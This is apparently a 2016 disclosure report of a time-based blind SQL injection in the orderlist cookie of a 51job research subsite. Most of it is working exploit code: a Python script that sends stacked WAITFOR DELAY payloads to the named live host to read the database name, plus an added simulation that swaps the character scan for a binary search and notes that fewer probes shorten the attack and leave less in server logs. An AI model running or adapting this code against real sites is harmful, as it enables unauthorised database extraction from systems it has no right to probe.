SQL injection on a 51job subsite

Title: SQL injection on a 51job subsite
Vendor: 前程无忧 (51job)
Author: 路人甲
Submitted: 2016-06-10 18:51
Published: 2016-06-17 11:00
Type: SQL injection…

Injection point: the orderlist cookie sent with requests to http://research.51job.com/order.html is concatenated into a SQL Server query. The proof of concept closes the expression with ")", appends a stacked statement of the form ;if(ascii(substring(DB_NAME(),i,1))>n) waitfor delay '0:0:10'-- and reads the database name one character at a time from whether the response is delayed by ten seconds (time-based blind injection).

Proof-of-concept script from the report:

```python
import string
import time

import requests


def getPayloadCookie(i, payload):
    # Cookie header carrying the injection: orderlist closes the expression with ")"
    # and stacks IF ... WAITFOR DELAY, so the server sleeps 10 s exactly when
    # ascii(substring(DB_NAME(), i, 1)) > ord(payload).  The cookie name "readlist"
    # is assumed (the page shows it machine-translated); Hm_* and HMACCOUNT are
    # tracking cookies copied from the captured request.
    x = ('ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM;'
         'readlist=196%2C25%2C294%2C340%2C307; '
         'orderlist=-1)%3Bif(ascii(substring(DB_NAME(),' + str(i) + ',1))>'
         + str(ord(payload)) + ")%20waitfor%20delay%20'0:0:10'%20--%20; "
         'Hm_lvt_2fb608bf1ad8b9b8ce2e04*003184e=1465491620,1465491620,1465491621,1465491621; '
         'Hm_lpvt_2fb608bf1ad8b9b8ce2e04*003184e=1465491621; '
         'HMACCOUNT=CE77C9E3D0040FF7')
    headers = {
        'Host': 'research.51job.com',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 '
                      '(KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://research.51job.com/',
        'Connection': 'keep-alive',
        'Cookie': x,
    }
    return headers


def exploit():
    res = ''
    url = 'http://research.51job.com/order.html'
    # Candidate characters for DB_NAME(), tried from the highest code point downwards.
    payloads = ['@', '_', '.'] + list(string.ascii_lowercase) + list(string.ascii_uppercase) + [str(i) for i in range(10)]
    payloads = sorted(payloads, reverse=True)
    for i in range(1, 30, 1):
        found = None
        prev = None
        for payload in payloads:
            try:
                headers = getPayloadCookie(i, payload)
                # The published listing ends at the line above; what follows is the
                # usual time-based check, not the author's code.  A response held for
                # the 10 s WAITFOR means char i > payload, so char i is the previously
                # tested (next larger) candidate.
                t0 = time.time()
                requests.get(url, headers=headers, timeout=30)
                if time.time() - t0 >= 8:
                    found = prev
                    break
                prev = payload
            except requests.RequestException as e:
                print('request failed: %s' % e)
                break
        if found is None:
            break  # no delay for any candidate: past the end of DB_NAME()
        res += found
        print(i, res)
    return res


if __name__ == '__main__':
    exploit()
```
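The inference the script relies on, as an added offline example that is not the report author's code: the predicate injected through the orderlist cookie is ascii(substring(DB_NAME(),i,1)) > n, answered by whether WAITFOR DELAY fires. The block below models that T-SQL predicate locally against a made-up database name (the real name is not on the page), runs the report's descending scan over its candidate set, and sets it beside a binary search over printable ASCII that uses the same strict predicate with at most eight probes per character. The database name, the probe-counting oracle and the function names are constructed for illustration.

```python
import string

# Constructed stand-in for the remote DB_NAME(); the real value is not on the page.
SIMULATED_DB_NAME = "job_research"


def mssql_predicate(db_name, i, n):
    """Model of the injected T-SQL predicate  ascii(substring(DB_NAME(), i, 1)) > n.

    SUBSTRING past the end of the string yields '' and ASCII('') is NULL, so the
    comparison is not TRUE and WAITFOR DELAY does not fire.  Returns True exactly
    when the real server would have held the response for 10 s.
    """
    if i < 1 or i > len(db_name):
        return False
    return ord(db_name[i - 1]) > n


class CountingOracle:
    """Stands in for one HTTP round trip per probe and counts the probes, so the
    two inference strategies can be compared."""

    def __init__(self, db_name):
        self.db_name = db_name
        self.probes = 0

    def __call__(self, i, n):
        self.probes += 1
        return mssql_predicate(self.db_name, i, n)


# The report's candidate set, scanned from the highest code point downwards.
PAGE_CANDIDATES = sorted(["@", "_", "."] + list(string.ascii_letters) + list(string.digits), reverse=True)


def infer_char_linear(oracle, i, candidates=PAGE_CANDIDATES):
    """Descending scan with the strict '>' predicate, as the report's loop does.

    The first candidate p that triggers a delay means char > p, so the character
    is the previously tested (next larger) candidate.  Limits: a character above
    'z' or equal to the smallest candidate ('.') is indistinguishable from the end
    of the string, and a character outside the set is either mis-read as the next
    larger candidate or, if below '.', taken as end of string.  Returns None for
    end of string.
    """
    prev = None
    for p in candidates:
        if oracle(i, ord(p)):
            return prev
        prev = p
    return None


def infer_char_bsearch(oracle, i, lo=31, hi=126):
    """Binary search over printable ASCII with the same strict '>' predicate.

    Invariant: lo < ord(char) <= hi.  The first probe doubles as the end-of-string
    check (the NULL case makes 'char > 31' false there).  At most 1 + 7 probes per
    character instead of up to len(PAGE_CANDIDATES).
    """
    if not oracle(i, lo):
        return None
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(i, mid):
            lo = mid
        else:
            hi = mid
    return chr(hi)


def extract_db_name(oracle, infer=infer_char_bsearch, max_len=30):
    """Recover DB_NAME() one position at a time, stopping at the first None (end
    of string), which is what the report's outer range(1, 30) loop is for."""
    out = []
    for i in range(1, max_len + 1):
        c = infer(oracle, i)
        if c is None:
            break
        out.append(c)
    return "".join(out)


def compare_strategies(db_name=SIMULATED_DB_NAME):
    """Run both strategies against the model; returns ((name, probes), (name, probes))
    for the linear scan and the binary search respectively."""
    lin = CountingOracle(db_name)
    bs = CountingOracle(db_name)
    return (
        (extract_db_name(lin, infer=infer_char_linear), lin.probes),
        (extract_db_name(bs, infer=infer_char_bsearch), bs.probes),
    )


if __name__ == "__main__":
    for label, (name, probes) in zip(("linear scan", "binary search"), compare_strategies()):
        print("%s: %r recovered in %d probes" % (label, name, probes))
```

Each probe that evaluates TRUE costs a full ten-second delay on the wire, so the probe count is the dominant factor in how long an extraction takes and how visible it is in server logs; the binary search also removes the candidate-set blind spots noted in infer_char_linear.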